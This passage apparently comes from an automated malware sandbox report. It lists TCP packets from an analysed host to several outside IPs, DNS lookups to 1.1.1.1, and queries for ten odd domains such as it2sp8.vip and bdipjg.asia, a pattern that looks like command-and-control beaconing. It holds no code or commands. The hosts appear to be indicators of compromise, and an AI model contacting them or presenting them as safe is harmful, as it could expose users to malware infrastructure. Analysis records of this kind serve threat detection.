                                                          Nov 5, 2024 15:43:53.858901024 CET8050021161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:53.861474991 CET5002180192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:54.387994051 CET5002180192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:55.407521963 CET5002280192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:55.412586927 CET8050022161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:55.412662029 CET5002280192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:55.427784920 CET5002280192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:55.432975054 CET8050022161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:55.432986975 CET8050022161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:55.432996035 CET8050022161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:55.433022976 CET8050022161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:55.433032990 CET8050022161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:55.433042049 CET8050022161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:55.433185101 CET8050022161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:55.433195114 CET8050022161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:55.433203936 CET8050022161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:56.255413055 CET8050022161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:56.255562067 CET8050022161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:56.255680084 CET5002280192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:56.554655075 CET8050022161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:56.554707050 CET5002280192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:56.934681892 CET5002280192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:57.953531027 CET5002380192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:57.958405972 CET8050023161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:57.958509922 CET5002380192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:57.965922117 CET5002380192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:57.971359968 CET8050023161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:58.817068100 CET8050023161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:58.817099094 CET8050023161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:58.817107916 CET8050023161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:58.817148924 CET8050023161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:58.817264080 CET5002380192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:58.817302942 CET5002380192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:58.942724943 CET8050023161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:43:58.942842960 CET5002380192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:58.943913937 CET5002380192.168.2.4161.97.142.144
                                                          Nov 5, 2024 15:43:58.948770046 CET8050023161.97.142.144192.168.2.4
                                                          Nov 5, 2024 15:44:03.976079941 CET5002480192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:03.981013060 CET80500248.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:03.981153011 CET5002480192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:03.992121935 CET5002480192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:03.996998072 CET80500248.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:04.961210012 CET80500248.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:05.012335062 CET5002480192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:05.155457973 CET80500248.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:05.155507088 CET5002480192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:05.496999979 CET5002480192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:06.517436028 CET5002580192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:06.777069092 CET80500258.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:06.777169943 CET5002580192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:06.791482925 CET5002580192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:06.796647072 CET80500258.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:07.782651901 CET80500258.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:07.824897051 CET5002580192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:07.973978043 CET80500258.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:07.974092960 CET5002580192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:08.297414064 CET5002580192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:09.313631058 CET5002680192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:09.318690062 CET80500268.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:09.318768024 CET5002680192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:09.332849979 CET5002680192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:09.337869883 CET80500268.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:09.337949991 CET80500268.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:09.337960005 CET80500268.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:09.337969065 CET80500268.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:09.337980032 CET80500268.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:09.338068008 CET80500268.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:09.338078976 CET80500268.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:09.338155985 CET80500268.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:09.338398933 CET80500268.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:10.292805910 CET80500268.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:10.344136953 CET5002680192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:10.476053953 CET80500268.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:10.481564999 CET5002680192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:10.840574980 CET5002680192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:11.861429930 CET5002780192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:11.866647005 CET80500278.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:11.866764069 CET5002780192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:11.874686003 CET5002780192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:11.879626989 CET80500278.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:12.878463030 CET80500278.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:12.934202909 CET5002780192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:13.051367044 CET80500278.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:13.051529884 CET5002780192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:13.052556038 CET5002780192.168.2.48.217.17.192
                                                          Nov 5, 2024 15:44:13.057296991 CET80500278.217.17.192192.168.2.4
                                                          Nov 5, 2024 15:44:18.885616064 CET5002880192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:18.890543938 CET805002878.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:18.890630960 CET5002880192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:18.905379057 CET5002880192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:18.911243916 CET805002878.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:19.697069883 CET805002878.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:19.746711969 CET5002880192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:19.804513931 CET805002878.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:19.804589033 CET5002880192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:20.419414043 CET5002880192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:21.438034058 CET5002980192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:21.443327904 CET805002978.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:21.443411112 CET5002980192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:21.456774950 CET5002980192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:21.461702108 CET805002978.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:22.279025078 CET805002978.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:22.327457905 CET5002980192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:22.386168957 CET805002978.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:22.387571096 CET5002980192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:22.965533972 CET5002980192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:23.988064051 CET5003080192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:23.992954016 CET805003078.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:23.995584965 CET5003080192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:24.009546995 CET5003080192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:24.014434099 CET805003078.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:24.014441013 CET805003078.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:24.014451981 CET805003078.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:24.014467001 CET805003078.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:24.014471054 CET805003078.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:24.014480114 CET805003078.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:24.014514923 CET805003078.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:24.014575958 CET805003078.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:24.014750957 CET805003078.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:24.812372923 CET805003078.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:24.856081963 CET5003080192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:24.927232027 CET805003078.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:24.927447081 CET5003080192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:25.512358904 CET5003080192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:26.531744003 CET5003180192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:26.537327051 CET805003178.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:26.537424088 CET5003180192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:26.547631979 CET5003180192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:26.552622080 CET805003178.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:27.334160089 CET805003178.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:27.387334108 CET5003180192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:27.440643072 CET805003178.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:27.440797091 CET5003180192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:27.441895962 CET5003180192.168.2.478.141.202.204
                                                          Nov 5, 2024 15:44:27.449146986 CET805003178.141.202.204192.168.2.4
                                                          Nov 5, 2024 15:44:32.871155977 CET5003280192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:32.877253056 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:32.877336025 CET5003280192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:32.889556885 CET5003280192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:32.897651911 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:33.582989931 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:33.583009958 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:33.583020926 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:33.583072901 CET5003280192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:33.583159924 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:33.583172083 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:33.583183050 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:33.583194017 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:33.583220005 CET5003280192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:33.583247900 CET5003280192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:33.583440065 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:33.583451033 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:33.583462954 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:33.583498955 CET5003280192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:33.583513975 CET5003280192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:33.588130951 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:33.588144064 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:33.588155031 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:33.588268042 CET5003280192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:33.622761965 CET8050032184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:33.622838974 CET5003280192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:34.405389071 CET5003280192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:35.422719955 CET5003380192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:35.692040920 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:35.696904898 CET5003380192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:35.709397078 CET5003380192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:35.714323997 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.379184961 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.379194975 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.379301071 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.379324913 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.379331112 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.379436970 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.379437923 CET5003380192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:36.379437923 CET5003380192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:36.380254030 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.380422115 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.380429983 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.380434990 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.380501986 CET5003380192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:36.380501986 CET5003380192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:36.386878967 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.386887074 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.387031078 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.387036085 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.387140036 CET5003380192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:36.418535948 CET8050033184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:36.419490099 CET5003380192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:37.215569973 CET5003380192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:38.239382029 CET5003480192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:38.244446039 CET8050034184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:38.248131037 CET5003480192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:38.259994030 CET5003480192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:38.264980078 CET8050034184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:38.264986992 CET8050034184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:38.264997005 CET8050034184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:38.265013933 CET8050034184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:38.265023947 CET8050034184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:38.265358925 CET8050034184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:38.265363932 CET8050034184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:38.265373945 CET8050034184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:38.266074896 CET8050034184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:38.988576889 CET8050034184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:38.988653898 CET8050034184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:38.988662004 CET8050034184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:38.988699913 CET8050034184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:38.988706112 CET8050034184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:38.988712072 CET8050034184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:38.988718987 CET8050034184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:38.988720894 CET5003480192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:38.988725901 CET8050034184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:38.988763094 CET5003480192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:38.988763094 CET5003480192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:38.988810062 CET5003480192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:38.989149094 CET8050034184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:38.989156961 CET8050034184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:38.989206076 CET5003480192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:38.993796110 CET8050034184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:38.993901014 CET8050034184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:38.993906975 CET8050034184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:38.993942976 CET5003480192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:39.027304888 CET8050034184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:39.027370930 CET5003480192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:39.769922018 CET5003480192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:40.782593966 CET5003580192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:40.787585974 CET8050035184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:40.787661076 CET5003580192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:40.796757936 CET5003580192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:40.801917076 CET8050035184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:41.510539055 CET8050035184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:41.510677099 CET8050035184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:41.510689974 CET8050035184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:41.510701895 CET8050035184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:41.510714054 CET8050035184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:41.510742903 CET5003580192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:41.510787964 CET8050035184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:41.510799885 CET8050035184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:41.510818005 CET5003580192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:41.510869980 CET5003580192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:41.510941982 CET8050035184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:41.510953903 CET8050035184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:41.510965109 CET8050035184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:41.511004925 CET5003580192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:41.511032104 CET5003580192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:41.515769005 CET8050035184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:41.515799999 CET8050035184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:41.515871048 CET5003580192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:41.549134016 CET8050035184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:41.549191952 CET5003580192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:41.589895964 CET5003580192.168.2.4184.94.215.26
                                                          Nov 5, 2024 15:44:41.594835043 CET8050035184.94.215.26192.168.2.4
                                                          Nov 5, 2024 15:44:47.412556887 CET5003680192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:44:47.417524099 CET80500363.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:44:47.417596102 CET5003680192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:44:47.430522919 CET5003680192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:44:47.435498953 CET80500363.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:44:48.062844992 CET80500363.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:44:48.065466881 CET5003680192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:44:48.934317112 CET5003680192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:44:48.939285040 CET80500363.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:44:49.953490973 CET5003780192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:44:49.958627939 CET80500373.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:44:49.959101915 CET5003780192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:44:49.970905066 CET5003780192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:44:49.976140976 CET80500373.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:44:50.595417023 CET80500373.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:44:50.599778891 CET5003780192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:44:51.484085083 CET5003780192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:44:51.489053011 CET80500373.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:44:52.500618935 CET5003880192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:44:52.505692959 CET80500383.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:44:52.505772114 CET5003880192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:44:52.518520117 CET5003880192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:44:52.523469925 CET80500383.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:44:52.523507118 CET80500383.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:44:52.523515940 CET80500383.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:44:52.523528099 CET80500383.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:44:52.523590088 CET80500383.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:44:52.523643970 CET80500383.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:44:52.523653984 CET80500383.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:44:52.523663044 CET80500383.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:44:52.523674965 CET80500383.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:44:53.173057079 CET80500383.33.130.190192.168.2.4
                                                          Nov 5, 2024 15:44:53.173155069 CET5003880192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:44:54.387470961 CET5003880192.168.2.43.33.130.190
                                                          Nov 5, 2024 15:44:54.392664909 CET80500383.33.130.190192.168.2.4

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Nov 5, 2024 15:42:21.011184931 CET6164653192.168.2.41.1.1.1
                                                          Nov 5, 2024 15:42:21.023955107 CET53616461.1.1.1192.168.2.4
                                                          Nov 5, 2024 15:42:39.813759089 CET6173853192.168.2.41.1.1.1
                                                          Nov 5, 2024 15:42:39.849195957 CET53617381.1.1.1192.168.2.4
                                                          Nov 5, 2024 15:42:53.282466888 CET5287353192.168.2.41.1.1.1
                                                          Nov 5, 2024 15:42:53.342533112 CET53528731.1.1.1192.168.2.4
                                                          Nov 5, 2024 15:43:08.344566107 CET6121853192.168.2.41.1.1.1
                                                          Nov 5, 2024 15:43:08.440668106 CET53612181.1.1.1192.168.2.4
                                                          Nov 5, 2024 15:43:36.954783916 CET5449153192.168.2.41.1.1.1
                                                          Nov 5, 2024 15:43:36.966566086 CET53544911.1.1.1192.168.2.4
                                                          Nov 5, 2024 15:43:50.266617060 CET6272853192.168.2.41.1.1.1
                                                          Nov 5, 2024 15:43:50.313757896 CET53627281.1.1.1192.168.2.4
                                                          Nov 5, 2024 15:44:03.953660011 CET5401653192.168.2.41.1.1.1
                                                          Nov 5, 2024 15:44:03.967772007 CET53540161.1.1.1192.168.2.4
                                                          Nov 5, 2024 15:44:18.063508987 CET4954553192.168.2.41.1.1.1
                                                          Nov 5, 2024 15:44:18.882421017 CET53495451.1.1.1192.168.2.4
                                                          Nov 5, 2024 15:44:32.454004049 CET6522853192.168.2.41.1.1.1
                                                          Nov 5, 2024 15:44:32.868058920 CET53652281.1.1.1192.168.2.4
                                                          Nov 5, 2024 15:44:46.595453978 CET5329753192.168.2.41.1.1.1
                                                          Nov 5, 2024 15:44:47.409607887 CET53532971.1.1.1192.168.2.4

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Nov 5, 2024 15:42:21.011184931 CET192.168.2.41.1.1.10xf3c8Standard query (0)www.it2sp8.vipA (IP address)IN (0x0001)false
                                                          Nov 5, 2024 15:42:39.813759089 CET192.168.2.41.1.1.10x5a9fStandard query (0)www.bandukchi.comA (IP address)IN (0x0001)false
                                                          Nov 5, 2024 15:42:53.282466888 CET192.168.2.41.1.1.10x62cbStandard query (0)www.onlineblikje.onlineA (IP address)IN (0x0001)false
                                                          Nov 5, 2024 15:43:08.344566107 CET192.168.2.41.1.1.10x3ac2Standard query (0)www.ninesquare.gamesA (IP address)IN (0x0001)false
                                                          Nov 5, 2024 15:43:36.954783916 CET192.168.2.41.1.1.10x7924Standard query (0)www.s9gzg9.vipA (IP address)IN (0x0001)false
                                                          Nov 5, 2024 15:43:50.266617060 CET192.168.2.41.1.1.10xbcacStandard query (0)www.030002832.xyzA (IP address)IN (0x0001)false
                                                          Nov 5, 2024 15:44:03.953660011 CET192.168.2.41.1.1.10x7fd3Standard query (0)www.meliorahomes.netA (IP address)IN (0x0001)false
                                                          Nov 5, 2024 15:44:18.063508987 CET192.168.2.41.1.1.10xd817Standard query (0)www.bdipjg.asiaA (IP address)IN (0x0001)false
                                                          Nov 5, 2024 15:44:32.454004049 CET192.168.2.41.1.1.10x34bfStandard query (0)www.sortcy.topA (IP address)IN (0x0001)false
                                                          Nov 5, 2024 15:44:46.595453978 CET192.168.2.41.1.1.10xbd1bStandard query (0)www.bearableguy.netA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Nov 5, 2024 15:42:21.023955107 CET1.1.1.1192.168.2.40xf3c8No error (0)www.it2sp8.vipit2sp8.vipCNAME (Canonical name)IN (0x0001)false
                                                          Nov 5, 2024 15:42:21.023955107 CET1.1.1.1192.168.2.40xf3c8No error (0)it2sp8.vip3.33.130.190A (IP address)IN (0x0001)false
                                                          Nov 5, 2024 15:42:21.023955107 CET1.1.1.1192.168.2.40xf3c8No error (0)it2sp8.vip15.197.148.33A (IP address)IN (0x0001)false
                                                          Nov 5, 2024 15:42:39.849195957 CET1.1.1.1192.168.2.40x5a9fNo error (0)www.bandukchi.combandukchi.comCNAME (Canonical name)IN (0x0001)false
                                                          Nov 5, 2024 15:42:39.849195957 CET1.1.1.1192.168.2.40x5a9fNo error (0)bandukchi.com3.33.130.190A (IP address)IN (0x0001)false
                                                          Nov 5, 2024 15:42:39.849195957 CET1.1.1.1192.168.2.40x5a9fNo error (0)bandukchi.com15.197.148.33A (IP address)IN (0x0001)false
                                                          Nov 5, 2024 15:42:53.342533112 CET1.1.1.1192.168.2.40x62cbNo error (0)www.onlineblikje.online213.249.67.10A (IP address)IN (0x0001)false
                                                          Nov 5, 2024 15:43:08.440668106 CET1.1.1.1192.168.2.40x3ac2No error (0)www.ninesquare.gamesninesquare.gamesCNAME (Canonical name)IN (0x0001)false
                                                          Nov 5, 2024 15:43:08.440668106 CET1.1.1.1192.168.2.40x3ac2No error (0)ninesquare.games3.33.130.190A (IP address)IN (0x0001)false
